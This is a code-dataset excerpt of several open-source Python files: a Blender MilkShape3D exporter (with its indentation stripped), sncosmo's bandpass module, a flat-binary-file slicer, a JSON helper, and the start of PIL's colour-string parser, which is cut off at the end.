| text | repo_name | path | language | license | size | score |
|---|---|---|---|---|---|---|
| string (lengths 6-947k) | string (lengths 5-100) | string (lengths 4-231) | string (1 class) | string (15 classes) | int64 (6-947k) | float64 (0-0.34) |
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Copyright (C) 2004-2015: Paul Vint [email protected]
"""
This script exports MilkShape3D ASCII text files from Blender
(http://www.blender.org). It supports face and vertex normals, colours, and
texture coordinates per face or per vertex. All selected mesh objects are
exported; every face must be a triangle.
"""
import bpy
import os
from mathutils import Color  # Color is used for the ambient fallback when no world is set
DEBUG = True
def getPrimaryVertexGroup(_vgroups, _v):
g = -1
w = 0
## Scan through any vertex groups and return the index of the one with the highest weight (or -1 if none)
for vertgroup in _v.groups:
if (vertgroup.weight > w):
w = vertgroup.weight
g = vertgroup.group
#fw("xx%fxx" % vertgroup.group)
return g
def face_iter_func(mesh):
    uv_layer = mesh.uv_textures.active.data
    uv_layer_len = len(uv_layer)
    for i in range(uv_layer_len):
        yield (i, uv_layer[i].uv)
def save(operator,
context,
filepath="",
use_modifiers=True,
use_normals=True,
use_uv_coords=True,
use_colors=True,
):
def rvec3d(v):
return round(v[0], 6), round(v[1], 6), round(v[2], 6)
def rvec2d(v):
return round(v[0], 6), round(v[1], 6)
scene = context.scene
obj = context.active_object
if not obj:
raise Exception("Error, Select 1 active object")
# Multiple meshes
objects = context.selected_objects
file = open(filepath, "w", encoding="utf8", newline="\n")
fw = file.write
fw("// Milkshape 3D ASCII\n\n")
fw("Frames: 30\n")
fw("Frame: 1\n\n")
if scene.objects.active:
bpy.ops.object.mode_set(mode='OBJECT')
o = 0
numArmatures = 0
numMeshes = 0
# count the meshes
for obj in objects:
if obj.type == "MESH":
numMeshes = numMeshes + 1
fw("Meshes: %d\n" % numMeshes)
for obj in objects:
## Check if it's an armature
if obj.type == "ARMATURE":
numArmatures = numArmatures + 1
else:
if use_modifiers:
mesh = obj.to_mesh(scene, True, 'PREVIEW')
else:
mesh = obj.data
if not mesh:
raise Exception("Error, could not get mesh data from active object")
# mesh.transform(obj.matrix_world) # XXX
has_uv = (len(mesh.uv_textures) > 0)
has_uv_vertex = (len(mesh.sticky) > 0)
# FIXME
#has_uv = True
has_vcol = len(mesh.vertex_colors) > 0
#if (not has_uv) and (not has_uv_vertex):
# use_uv_coords = False
if not has_vcol:
use_colors = False
if not use_uv_coords:
has_uv = has_uv_vertex = False
if not use_colors:
has_vcol = False
if has_uv:
active_uv_layer = mesh.uv_textures.active
if not active_uv_layer:
use_uv_coords = False
has_uv = False
else:
active_uv_layer = active_uv_layer.data
if False: # Testing
for i, uv in face_iter_func(mesh):
fw("%d %f \n" % (i, uv[0][0]))
return True
## Get UV list
if has_uv:
faceUVs = []
for i, uv in face_iter_func(mesh):
faceUVs.append(uv)
if has_vcol:
active_col_layer = mesh.vertex_colors.active
if not active_col_layer:
use_colors = False
has_vcol = False
else:
active_col_layer = active_col_layer.data
# in case
color = uvcoord = uvcoord_key = normal = normal_key = None
mesh_verts = mesh.vertices # save a lookup
ply_verts = [] # list of dictionaries
# vdict = {} # (index, normal, uv) -> new index
vdict = [{} for i in range(len(mesh_verts))]
ply_faces = [[] for f in range(len(mesh.faces))]
vert_count = 0
## Vertex Group Testing
vGroups = []
vGroupsIndices = []
if (obj.vertex_groups):
for x in obj.vertex_groups:
#fw("=%d %s\n" % (x.index, x.name))
                    vGroups.append((x.index, x.name))  # (index, name) pairs
vGroupsIndices.append(x.index)
## Yielded:
#0 Bone
#1 Bone.002
#2 Bone.001
for i, f in enumerate(mesh.faces):
# GOOD: fw("Verts: %d %d %d\n" % (f.vertices[0], f.vertices[1], f.vertices[2]))
smooth = f.use_smooth
if not smooth:
normal = tuple(f.normal)
normal_key = rvec3d(normal)
if has_uv:
uv = active_uv_layer[i]
uv = uv.uv1, uv.uv2, uv.uv3, uv.uv4 # XXX - crufty :/
if has_vcol:
col = active_col_layer[i]
col = col.color1[:], col.color2[:], col.color3[:], col.color4[:]
f_verts = f.vertices
pf = ply_faces[i]
## FIXME Deprecated
for j, vidx in enumerate(f_verts):
v = mesh_verts[vidx]
if smooth:
normal = tuple(v.normal)
normal_key = rvec3d(normal)
if has_uv:
uvcoord = uv[j][0], 1.0 - uv[j][1]
uvcoord_key = rvec2d(uvcoord)
elif has_uv_vertex:
uvcoord = v.uvco[0], 1.0 - v.uvco[1]
uvcoord_key = rvec2d(uvcoord)
if has_vcol:
color = col[j]
color = (int(color[0] * 255.0),
int(color[1] * 255.0),
int(color[2] * 255.0),
)
key = normal_key, uvcoord_key, color
vdict_local = vdict[vidx]
pf_vidx = vdict_local.get(key) # Will be None initially
if pf_vidx is None: # same as vdict_local.has_key(key)
pf_vidx = vdict_local[key] = vert_count
ply_verts.append((vidx, normal, uvcoord, color))
vert_count += 1
pf.append(pf_vidx)
# Mesh name, flags, material index
fw("\"%s\" 0 %d\n" % (obj.name, o))
#fw("%d\n" % (len(mesh.faces) * 3))
#if use_colors:
# fw("property uchar red\n"
# "property uchar green\n"
# "property uchar blue\n")
#fw("element face %d\n" % len(mesh.faces))
#fw("property list uchar uint vertex_indices\n")
#fw("end_header\n")
# mesh.vertices is array of vertex coords
# face.vertices is array of vertex indices
# to get unique vertices in the file create an array of all vertices and
# then find the highest index in the list of faces and use only up to
# that one to only have unique vertices
maxIndex = 0
numVerts = 0
for f in mesh.faces:
for v in f.vertices:
numVerts = numVerts + 1
if (v >= maxIndex):
maxIndex = v
maxIndex = maxIndex + 1
#fw("%d\n" % (maxIndex))
## create array of verts
vco = []
fverts = []
            ## make an indexable list of vertices (fverts[i] is mesh.vertices[i])
            for v in mesh.vertices:
                fverts.append(v)
### The following method is crap - need to duplicate verts for when they have different
### UV coords for different faces!
#for i in range(0, maxIndex):
#fw("0 %.4f %.4f %.4f " % (-fverts[i].co[0], fverts[i].co[2], -fverts[i].co[1]))
#fw('0.0, 0.0') # uv
# Vertex Group
#vg = getPrimaryVertexGroup(vGroups, fverts[i])
#fw(" %d\n" % vg)
## Prep for UVs
activeUV = mesh.uv_textures[0].data
#if has_uv:
# actuveUV = mesh.uv_textures
### Dump each vert on each face
fw("%d\n" % numVerts)
fIdx = 0
for f in mesh.faces:
if (len(f.vertices) != 3):
raise Exception("Error! All faces must be triangles. (Convert in edit mode by pressing CTRL-t)")
## Loop through each vertex in the face
vIdx = 0
uv = activeUV[fIdx]
fuv = uv.uv1, uv.uv2, uv.uv3
for v in f.vertices:
fw("0 %.4f %.4f %.4f " % (-fverts[v].co[0], fverts[v].co[2], -fverts[v].co[1]))
## uv coords
#for i, uv in face_iter_func(mesh):
#fw("%d %f \n" % (i, uv[0][0]))
if has_uv:
fw("%.4f %.4f " % (faceUVs[fIdx][vIdx][0], 1.0 - faceUVs[fIdx][vIdx][1]))
#fw("%.4f %.4f " % (fverts[v].uv[0], 1 - fverts[v].uv[1]))
else:
fw("0.0000 0.0000 ");
## Vertex Group
if not obj.vertex_groups:
vg = -1
else:
vg = getPrimaryVertexGroup(vGroups, fverts[v])
fw("%d\n" % vg)
vIdx = vIdx + 1
fIdx = fIdx + 1
# Repeat the above loop to get vertex normals
fw("%d\n" % numVerts)
for f in mesh.faces:
## Test if using smoothing or not
if f.use_smooth:
## Loop through each vertex in the face
for v in f.vertices:
fw("%.4f %.4f %.4f\n" % (-fverts[v].normal[0], fverts[v].normal[2], -fverts[v].normal[1]))
else:
for v in f.vertices:
fw("%.4f %.4f %.4f\n" % (-f.normal[0], f.normal[2], -f.normal[1]))
# Get Face info
# TODO: Smoothing groups
# A bit BFI, but vertices are in order
fw("%d\n" % len(ply_faces))
v = 0
for f in mesh.faces:
fw("1 %d %d %d" % (v + 2, v + 1, v))
fw(" %d %d %d 1\n" % (v + 2, v + 1, v))
v = v + 3
o = o + 1
## Materials
# Note: Limiting to one mat per mesh, and assuming every mesh has one
world = scene.world
if world:
world_amb = world.ambient_color
else:
world_amb = Color((0.0, 0.0, 0.0))
fw("\nMaterials: %d\n" % o)
o = 0
for obj in objects:
if obj.type != "ARMATURE":
materials = obj.data.materials[:]
mat = materials[0]
fw("\"Mat%d\"\n" % o)
## ambient
fw('%.6f %.6f %.6f 1.000000\n' % (mat.diffuse_color * mat.ambient)[:])
            ## Diffuse
fw("%.6f %.6f %.6f 1.000000\n" % (mat.diffuse_intensity * mat.diffuse_color)[:])
fw("%.6f %.6f %.6f 1.000000\n" % (mat.specular_intensity * mat.specular_color)[:]) # Specular
fw('%.6f %.6f %.6f 1.000000\n' % (mat.diffuse_color * mat.emit)[:])
fw("%.6f\n" % mat.specular_hardness)
fw("%.6f\n" % mat.alpha)
if (len(obj.data.uv_textures) > 0):
uv_layer = obj.data.uv_textures.active.data[:]
uv_image = uv_layer[0].image
if (uv_image):
fw("\"%s\"\n" % uv_image.filepath)
else:
fw("\"\"\n")
else:
fw("\"\"\n")
# TODO: Alpha texture
fw("\"\"\n")
o = o + 1
fw("\n")
#fw("Bones: %d\n" % numArmatures)
numBones = 0
# count the bones
for obj in objects:
if obj.type == "ARMATURE":
for b in obj.pose.bones:
numBones = numBones + 1
fw("Bones: %d\n" % numBones)
# export the bones
for obj in objects:
if obj.type == "ARMATURE":
for b in obj.pose.bones:
## Give the file the bone!
## Bone Name
fw("\"%s\"\n" % b.name)
## Parent Name
if (len(b.parent_recursive) > 0 ):
fw("\"%s\"\n" % b.parent.name)
else:
fw("\"\"\n")
## // joint: flags, posx, posy, posz, rotx, roty, rotz
## Looking at examples the flag appears to always be 24 (?)
## Not sure how to get rot - skip it for now
fw("24 %.6f %.6f %.6f 0 0 0\n" % ( -b.head[0], b.head[2], -b.head[1]))
## Number of position keys - using the number of frames in the anim sequence
fw("%d\n" % (scene.frame_end - scene.frame_start))
## FIXME Not sure how to handle time, just doing 1 sec per frame for now
secs = 1
## // position key: time, posx, posy, posz
for frame in range(scene.frame_start, scene.frame_end):
## Go to the first frame
scene.frame_set(frame)
fw("%.6f %.6f %.6f %.6f\n" % ( secs, -b.tail[0], b.tail[2], -b.tail[1]))
secs = secs + 1
                ### Rotation Keys
                # Just using number of frames for now with rots all 0.0,
                # timed one second per frame like the position keys above
                fw("%d\n" % (scene.frame_end - scene.frame_start))
                secs = 1
                for frame in range(scene.frame_start, scene.frame_end):
                    fw("%d 0.000000 0.000000 0.000000\n" % secs)
                    secs = secs + 1
## End of this bone
fw("\n")
fw("GroupComments: 0\n")
fw("MaterialComments: 0\n")
fw("BoneComments: 0\n")
fw("ModelComment: 0\n")
file.close()
print("writing %r done" % filepath)
if use_modifiers:
bpy.data.meshes.remove(mesh)
# XXX
"""
if is_editmode:
Blender.Window.EditMode(1, "", 0)
"""
return {'FINISHED'}
| pvint/Blender2MS3d | io_mesh_ms3d/export_ms3d.py | Python | gpl-2.0 | 11,954 | 0.03915 |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import copy
import astropy.units as u
import numpy as np
from astropy.io import ascii
from astropy.utils import lazyproperty
from scipy.interpolate import splev, splrep
from ._registry import Registry
from .constants import HC_ERG_AA, SPECTRUM_BANDFLUX_SPACING
from .utils import integration_grid
__all__ = ['get_bandpass', 'read_bandpass', 'Bandpass', 'AggregateBandpass',
'BandpassInterpolator']
_BANDPASSES = Registry()
_BANDPASS_INTERPOLATORS = Registry()
def get_bandpass(name, *args):
"""Get a Bandpass from the registry by name."""
if isinstance(name, Bandpass):
return name
if len(args) == 0:
return _BANDPASSES.retrieve(name)
else:
interp = _BANDPASS_INTERPOLATORS.retrieve(name)
return interp.at(*args)
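# Usage sketch (the band names below are illustrative; what is actually
# available depends on what has been registered in _BANDPASSES and
# _BANDPASS_INTERPOLATORS):
#
#   band = get_bandpass('sdssr')              # plain registered bandpass
#   band = get_bandpass('megacampsf::r', 8.)  # interpolator evaluated at a
#                                             # focal-plane position of 8.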
def read_bandpass(fname, fmt='ascii', wave_unit=u.AA,
trans_unit=u.dimensionless_unscaled,
normalize=False, trim_level=None, name=None):
"""Read bandpass from two-column ASCII file containing wavelength and
transmission in each line.
Parameters
----------
fname : str
File name.
fmt : {'ascii'}
File format of file. Currently only ASCII file supported.
wave_unit : `~astropy.units.Unit` or str, optional
Wavelength unit. Default is Angstroms.
trans_unit : `~astropy.units.Unit`, optional
Transmission unit. Can be `~astropy.units.dimensionless_unscaled`,
indicating a ratio of transmitted to incident photons, or units
proportional to inverse energy, indicating a ratio of transmitted
photons to incident energy. Default is ratio of transmitted to
incident photons.
normalize : bool, optional
If True, normalize fractional transmission to be 1.0 at peak.
It is recommended to set to True if transmission is in units
of inverse energy. (When transmission is given in these units, the
absolute value is usually not significant; normalizing gives more
reasonable transmission values.) Default is False.
    trim_level : float, optional
        If given, crop bandpass to the region where transmission is above
        this fraction of the maximum transmission (see `Bandpass`).
    name : str, optional
        Identifier. Default is `None`.
Returns
-------
band : `~sncosmo.Bandpass`
"""
if fmt != 'ascii':
raise ValueError("format {0} not supported. Supported formats: 'ascii'"
.format(fmt))
t = ascii.read(fname, names=['wave', 'trans'])
return Bandpass(t['wave'], t['trans'], wave_unit=wave_unit,
trans_unit=trans_unit, normalize=normalize,
trim_level=trim_level, name=name)
def slice_exclude_below(a, minvalue, grow=1):
"""Contiguous range in 1-d array `a` that excludes values less than
`minvalue`. Range is expanded by `grow` in each direction."""
idx = np.flatnonzero(a >= minvalue)
i0 = max(idx[0] - grow, 0)
i1 = min(idx[-1] + 1 + grow, len(a)) # exclusive
return slice(i0, i1)
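# For example, with the definition above:
#   slice_exclude_below(np.array([0., 0., 5., 6., 0., 0.]), 1., grow=1)
# returns slice(1, 5): the indices of values >= 1 are [2, 3], and the range
# is padded by one sample on each side.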
class Bandpass(object):
"""Transmission as a function of spectral wavelength.
Parameters
----------
wave : list_like
Wavelength. Monotonically increasing values.
trans : list_like
Transmission fraction.
wave_unit : `~astropy.units.Unit` or str, optional
Wavelength unit. Default is Angstroms.
trans_unit : `~astropy.units.Unit`, optional
Transmission unit. Can be `~astropy.units.dimensionless_unscaled`,
indicating a ratio of transmitted to incident photons, or units
proportional to inverse energy, indicating a ratio of transmitted
photons to incident energy. Default is ratio of transmitted to
incident photons.
normalize : bool, optional
If True, normalize fractional transmission to be 1.0 at peak.
It is recommended to set normalize=True if transmission is in units
of inverse energy. (When transmission is given in these units, the
absolute value is usually not significant; normalizing gives more
reasonable transmission values.) Default is False.
trim_level : float, optional
If given, crop bandpass to region where transmission is above this
fraction of the maximum transmission. For example, if maximum
transmission is 0.5, ``trim_level=0.001`` will remove regions where
transmission is below 0.0005. Only contiguous regions on the sides
of the bandpass are removed.
name : str, optional
Identifier. Default is `None`.
Examples
--------
Construct a Bandpass and access the input arrays:
>>> b = Bandpass([4000., 4200., 4400.], [0.5, 1.0, 0.5])
>>> b.wave
array([ 4000., 4200., 4400.])
>>> b.trans
array([ 0.5, 1. , 0.5])
Bandpasses act like continuous 1-d functions (linear interpolation is
used):
>>> b([4100., 4300.])
array([ 0.75, 0.75])
The effective (transmission-weighted) wavelength is a property:
>>> b.wave_eff
4200.0
The ``trim_level`` keyword can be used to remove "out-of-band"
transmission upon construction. The following example removes regions of
    the bandpass with transmission less than 1 percent of peak:
>>> band = Bandpass([4000., 4100., 4200., 4300., 4400., 4500.],
... [0.001, 0.002, 0.5, 0.6, 0.003, 0.001],
... trim_level=0.01)
>>> band.wave
array([ 4100., 4200., 4300., 4400.])
>>> band.trans
array([ 0.002, 0.5 , 0.6 , 0.003])
While less strictly correct than including the "out-of-band" transmission,
only considering the region of the bandpass where transmission is
significant can improve model-bandpass overlap as well as performance.
"""
def __init__(self, wave, trans, wave_unit=u.AA,
trans_unit=u.dimensionless_unscaled, normalize=False,
name=None, trim_level=None):
wave = np.asarray(wave, dtype=np.float64)
trans = np.asarray(trans, dtype=np.float64)
if wave.shape != trans.shape:
raise ValueError('shape of wave and trans must match')
if wave.ndim != 1:
raise ValueError('only 1-d arrays supported')
# Ensure that units are actually units and not quantities, so that
# `to` method returns a float and not a Quantity.
wave_unit = u.Unit(wave_unit)
trans_unit = u.Unit(trans_unit)
if wave_unit != u.AA:
wave = wave_unit.to(u.AA, wave, u.spectral())
# If transmission is in units of inverse energy, convert to
# unitless transmission:
#
# (transmitted photons / incident photons) =
# (photon energy) * (transmitted photons / incident energy)
#
# where photon energy = h * c / lambda
if trans_unit != u.dimensionless_unscaled:
trans = (HC_ERG_AA / wave) * trans_unit.to(u.erg**-1, trans)
# Check that values are monotonically increasing.
# We could sort them, but if this happens, it is more likely a user
# error or faulty bandpass definition. So we leave it to the user to
# sort them.
if not np.all(np.ediff1d(wave) > 0.):
raise ValueError('bandpass wavelength values must be monotonically'
' increasing when supplied in wavelength or '
'decreasing when supplied in energy/frequency.')
if normalize:
trans /= np.max(trans)
# Trim "out-of-band" transmission
if trim_level is not None:
s = slice_exclude_below(trans, np.max(trans) * trim_level, grow=1)
wave = wave[s]
trans = trans[s]
# if more than one leading or trailing transmissions are zero, we
# can remove them.
if ((trans[0] == 0.0 and trans[1] == 0.0) or (trans[-1] == 0.0 and
trans[-2] == 0.0)):
i = 0
while i < len(trans) and trans[i] == 0.0:
i += 1
if i == len(trans):
raise ValueError('all zero transmission')
j = len(trans) - 1
while j >= 0 and trans[j] == 0.0:
j -= 1
# back out to include a single zero
if i > 0:
i -= 1
if j < len(trans) - 1:
j += 1
wave = wave[i:j+1]
trans = trans[i:j+1]
self.wave = wave
self.trans = trans
# Set up interpolation.
# This appears to be the fastest-evaluating interpolant in
# scipy.interpolate.
self._tck = splrep(self.wave, self.trans, k=1)
self.name = name
def minwave(self):
return self.wave[0]
def maxwave(self):
return self.wave[-1]
@lazyproperty
def wave_eff(self):
"""Effective wavelength of bandpass in Angstroms."""
wave, _ = integration_grid(self.minwave(), self.maxwave(),
SPECTRUM_BANDFLUX_SPACING)
weights = self(wave)
return np.sum(wave * weights) / np.sum(weights)
def __call__(self, wave):
return splev(wave, self._tck, ext=1)
def __repr__(self):
name = ''
if self.name is not None:
name = ' {!r}'.format(self.name)
return "<{:s}{:s} at 0x{:x}>".format(self.__class__.__name__, name,
id(self))
def shifted(self, factor, name=None):
"""Return a new Bandpass instance with all wavelengths
multiplied by a factor."""
return Bandpass(factor * self.wave, self.trans, name=name)
class _SampledFunction(object):
"""Represents a 1-d continuous function, used in AggregateBandpass."""
def __init__(self, x, y):
self.x = np.asarray(x, dtype=np.float64)
self.y = np.asarray(y, dtype=np.float64)
self.xmin = x[0]
self.xmax = x[-1]
self._tck = splrep(self.x, self.y, k=1)
def __call__(self, x):
return splev(x, self._tck, ext=1)
class AggregateBandpass(Bandpass):
"""Bandpass defined by multiple transmissions in series.
Parameters
----------
transmissions : list of (wave, trans) pairs.
Functions defining component transmissions.
prefactor : float, optional
Scalar factor to multiply transmissions by. Default is 1.0.
name : str, optional
Name of bandpass.
family : str, optional
Name of "family" this bandpass belongs to. Such an identifier can
be useful for identifying bandpasses belonging to the same
instrument/filter combination but different focal plane
positions.
"""
def __init__(self, transmissions, prefactor=1.0, name=None, family=None):
if len(transmissions) < 1:
raise ValueError("empty list of transmissions")
# Set up transmissions as `_SampledFunction`s.
#
# We allow passing `_SampledFunction`s directly to allow
# RadialBandpassGenerator to generate AggregateBandpasses a
# bit more efficiently, even though _SampledFunction isn't
# part of the public API.
self.transmissions = [t if isinstance(t, _SampledFunction)
else _SampledFunction(t[0], t[1])
for t in transmissions]
self.prefactor = prefactor
self.name = name
self.family = family
# Determine min/max wave: since sampled functions are zero outside
# their domain, minwave is the *largest* minimum x value, and
# vice-versa for maxwave.
self._minwave = max(t.xmin for t in self.transmissions)
self._maxwave = min(t.xmax for t in self.transmissions)
def minwave(self):
return self._minwave
def maxwave(self):
return self._maxwave
def __str__(self):
return ("AggregateBandpass: {:d} components, prefactor={!r}, "
"range=({!r}, {!r}), name={!r}"
.format(len(self.transmissions), self.prefactor,
self.minwave(), self.maxwave(), self.name))
def __call__(self, wave):
t = self.transmissions[0](wave)
for trans in self.transmissions[1:]:
t *= trans(wave)
t *= self.prefactor
return t
def shifted(self, factor, name=None, family=None):
"""Return a new AggregateBandpass instance with all wavelengths
multiplied by a factor."""
transmissions = [(factor * t.x, t.y) for t in self.transmissions]
return AggregateBandpass(transmissions,
prefactor=self.prefactor,
name=name, family=family)
class BandpassInterpolator(object):
"""Bandpass generator defined as a function of focal plane position.
Instances of this class are not Bandpasses themselves, but
generate Bandpasses at a given focal plane position. This class
stores the transmission as a function of focal plane position and
interpolates between the defined positions to return the bandpass
at an arbitrary position.
Parameters
----------
transmissions : list of (wave, trans) pairs
Transmissions that apply everywhere in the focal plane.
dependent_transmissions : list of (value, wave, trans)
Transmissions that depend on some parameter. Each `value` is the
scalar parameter value, `wave` and `trans` are 1-d arrays.
prefactor : float, optional
Scalar multiplying factor.
name : str
Examples
--------
Transmission uniform across focal plane:
>>> uniform_trans = ([4000., 5000.], [1., 0.5]) # wave, trans
Transmissions as a function of radius:
>>> trans0 = (0., [4000., 5000.], [0.5, 0.5]) # radius=0
>>> trans1 = (1., [4000., 5000.], [0.75, 0.75]) # radius=1
>>> trans2 = (2., [4000., 5000.], [0.1, 0.1]) # radius=2
>>> band_interp = BandpassInterpolator([uniform_trans],
... [trans0, trans1, trans2],
... name='my_band')
Min and max radius:
>>> band_interp.minpos(), band_interp.maxpos()
(0.0, 2.0)
Get bandpass at a given radius:
>>> band = band_interp.at(1.5)
>>> band
<AggregateBandpass 'my_band at 1.500000' at 0x7f7a2e425668>
The band is aggregate of uniform transmission part,
and interpolated radial-dependent part.
>>> band([4500., 4600.])
array([ 0.65625, 0.6125 ])
"""
def __init__(self, transmissions, dependent_transmissions,
prefactor=1.0, name=None):
# create sampled functions for normal transmissions
self.transmissions = [_SampledFunction(t[0], t[1])
for t in transmissions]
# ensure dependent transmissions are sorted
sorted_trans = sorted(dependent_transmissions, key=lambda x: x[0])
self.dependent_transmissions = [(t[0], _SampledFunction(t[1], t[2]))
for t in sorted_trans]
self.prefactor = prefactor
self.name = name
def minpos(self):
"""Minimum positional parameter value."""
return self.dependent_transmissions[0][0]
def maxpos(self):
"""Maximum positional parameter value."""
return self.dependent_transmissions[-1][0]
def at(self, pos):
"""Return the bandpass at the given position"""
if pos < self.minpos() or pos >= self.maxpos():
raise ValueError("Position outside bounds")
# find index such that t[i-1] <= pos < t[i]
i = 1
while (i < len(self.dependent_transmissions) and
pos > self.dependent_transmissions[i][0]):
i += 1
# linearly interpolate second transmission onto first
v0, f0 = self.dependent_transmissions[i-1]
v1, f1 = self.dependent_transmissions[i]
w1 = (pos - v0) / (v1 - v0)
w0 = 1.0 - w1
x = f0.x
y = w0 * f0.y + w1 * f1(x)
f = _SampledFunction(x, y)
transmissions = copy.copy(self.transmissions) # shallow copy the list
transmissions.append(f)
name = "" if self.name is None else (self.name + " ")
name += "at {:f}".format(pos)
return AggregateBandpass(transmissions, prefactor=self.prefactor,
name=name, family=self.name)
| sncosmo/sncosmo | sncosmo/bandpasses.py | Python | bsd-3-clause | 16,460 | 0 |
#!/usr/bin/env python
from . import memfbf
from numpy import append
import os
import logging
from glob import glob
LOG = logging.getLogger(__name__)
class SlicerFrame(dict):
pass
class FBFSlicer(object):
"""Given a workspace directory of flat binary files, grab all useful filenames and return a record of data at a
time as a python dictionary.
"""
def __init__(self, work_dir, buffer_size=0, filename_filter=None):
"""Initialize slicer object parameters.
:param work_dir: Workspace directory of flat binary files to read
:param buffer_size: Circular buffer size or 0 for non-circular buffers/FBFs
:param filename_filter: Filter function that returns True if the provided file should be opened for reading.
Should return False otherwise.
"""
self._wd = work_dir
self._buffer_size = buffer_size
self._open_files = dict()
if filename_filter is None:
filename_filter = lambda filename: True
self.should_include = filename_filter
def _update_open_files(self):
for fn in glob(os.path.join(self._wd, '*')):
if fn not in self._open_files and self.should_include(os.path.split(fn)[-1]):
LOG.debug('opening %s' % fn)
try:
nfo = memfbf.FBF(fn)
except Exception as oops:
nfo = None
LOG.info('%s could not be opened as FBF' % fn)
LOG.debug(repr(oops))
LOG.debug('found new file %s' % fn)
self._open_files[fn] = nfo
def __call__(self, first_record, last_record=None):
"""Retrieve a slice of a FBF directory using inclusive 1-based record number range, noting
that last-first+1 records are returned.
"""
last_record = first_record if last_record is None else last_record
if not self._open_files:
self._update_open_files()
data = SlicerFrame()
for name, nfo in self._open_files.items():
if nfo is not None:
# note we use % in order to deal with
# wavenumber files that are only ever 1 record long
# circular buffers which are fixed length files
file_len = nfo.length()
# check for non-circular buffer case and going off the end of the file
# note use of > since record numbers are 1-based
if (self._buffer_size == 0) and (file_len != 1) and (first_record > file_len or last_record > file_len):
LOG.warning('%s: length is %d but start-end is %d-%d' % (name, file_len, first_record, last_record))
return None
# check for circular buffers that aren't preallocated properly
if self._buffer_size > 0 and file_len not in (1, self._buffer_size):
LOG.info('buffer file %s size mismatch (%d != %d)! ignoring' % (name, file_len, self._buffer_size))
else:
# 0-based circular buffer
first_index = (first_record - 1) % file_len
last_index = (last_record - 1) % file_len
if last_index >= first_index:
# Records are in one continuous line
idx = slice(first_index, last_index + 1) # +1 to include last item
data[nfo.stemname] = nfo[idx]
else:
# Records are on two ends of the circular buffer
idx1 = slice(first_index, self._buffer_size)
idx2 = slice(0, last_index + 1) # +1 to include last item
arr1 = nfo[idx1]
arr2 = nfo[idx2]
data[nfo.stemname] = append(arr1, arr2, axis=0)
return data
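# Minimal usage sketch (the workspace path and record range are illustrative):
#
#   slicer = FBFSlicer('/data/fbf_workspace', buffer_size=0)
#   frame = slicer(1, 10)  # records 1..10 (inclusive) from each matching file
#   # ``frame`` is a SlicerFrame mapping each FBF stem name to its records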
| davidh-ssec/pyfbf | pyfbf/slicer.py | Python | gpl-3.0 | 3,928 | 0.003564 |
import json
def jsonSave(data, fileName, indent=True, sort=False, oneLine=False):
    with open(fileName, 'w') as f:
        if indent:
            f.write(json.dumps(data, indent=4, sort_keys=sort))
        else:
            f.write(json.dumps(data, sort_keys=sort))
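# Usage sketch (the path is illustrative):
#   jsonSave({'a': 1}, '/tmp/data.json', sort=True)
#   data = jsonLoad('/tmp/data.json')  # -> {'a': 1}, or {} if unreadable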
def jsonLoad(fileName):
    try:
        with open(fileName) as f:
            return json.loads(f.read())
    except (IOError, ValueError):
        # missing or unparseable file: fall back to an empty dict
        return {}
| tannerbohn/ScholarVR | Code/fileIO.py | Python | gpl-2.0 | 368 | 0.05163 |
#
# The Python Imaging Library
# $Id$
#
# map CSS3-style colour description strings to RGB
#
# History:
# 2002-10-24 fl Added support for CSS-style color strings
# 2002-12-15 fl Added RGBA support
# 2004-03-27 fl Fixed remaining int() problems for Python 1.5.2
# 2004-07-19 fl Fixed gray/grey spelling issues
# 2009-03-05 fl Fixed rounding error in grayscale calculation
#
# Copyright (c) 2002-2004 by Secret Labs AB
# Copyright (c) 2002-2004 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from PIL import Image
import re
##
# Convert color string to RGB tuple.
#
# @param color A CSS3-style colour string.
# @return An RGB-tuple.
# @exception ValueError If the color string could not be interpreted
# as an RGB value.
def getrgb(color):
"""
Convert a color string to an RGB tuple. If the string cannot be parsed,
this function raises a :py:exc:`ValueError` exception.
.. versionadded:: 1.1.4
:param color: A color string
:return: ``(red, green, blue)``
"""
try:
rgb = colormap[color]
except KeyError:
try:
# fall back on case-insensitive lookup
rgb = colormap[color.lower()]
except KeyError:
rgb = None
# found color in cache
if rgb:
if isinstance(rgb, tuple):
return rgb
colormap[color] = rgb = getrgb(rgb)
return rgb
# check for known string formats
m = re.match("#\w\w\w$", color)
if m:
return (
int(color[1]*2, 16),
int(color[2]*2, 16),
int(color[3]*2, 16)
)
m = re.match("#\w\w\w\w\w\w$", color)
if m:
return (
int(color[1:3], 16),
int(color[3:5], 16),
int(color[5:7], 16)
)
m = re.match("rgb\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)$", color)
if m:
return (
int(m.group(1)),
int(m.group(2)),
int(m.group(3))
)
m = re.match("rgb\(\s*(\d+)%\s*,\s*(\d+)%\s*,\s*(\d+)%\s*\)$", color)
if m:
return (
int((int(m.group(1)) * 255) / 100.0 + 0.5),
int((int(m.group(2)) * 255) / 100.0 + 0.5),
int((int(m.group(3)) * 255) / 100.0 + 0.5)
)
m = re.match("hsl\(\s*(\d+)\s*,\s*(\d+)%\s*,\s*(\d+)%\s*\)$", color)
if m:
from colorsys import hls_to_rgb
rgb = hls_to_rgb(
float(m.group(1)) / 360.0,
float(m.group(3)) / 100.0,
float(m.group(2)) / 100.0,
)
return (
int(rgb[0] * 255 + 0.5),
int(rgb[1] * 255 + 0.5),
int(rgb[2] * 255 + 0.5)
)
m = re.match("rgba\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)$", color)
if m:
return (
int(m.group(1)),
int(m.group(2)),
int(m.group(3)),
int(m.group(4))
)
raise ValueError("unknown color specifier: %r" % color)
def getcolor(color, mode):
"""
Same as :py:func:`~PIL.ImageColor.getrgb`, but converts the RGB value to a
greyscale value if the mode is not color or a palette image. If the string
cannot be parsed, this function raises a :py:exc:`ValueError` exception.
.. versionadded:: 1.1.4
    :param color: A color string
    :param mode: Image mode used to convert the result
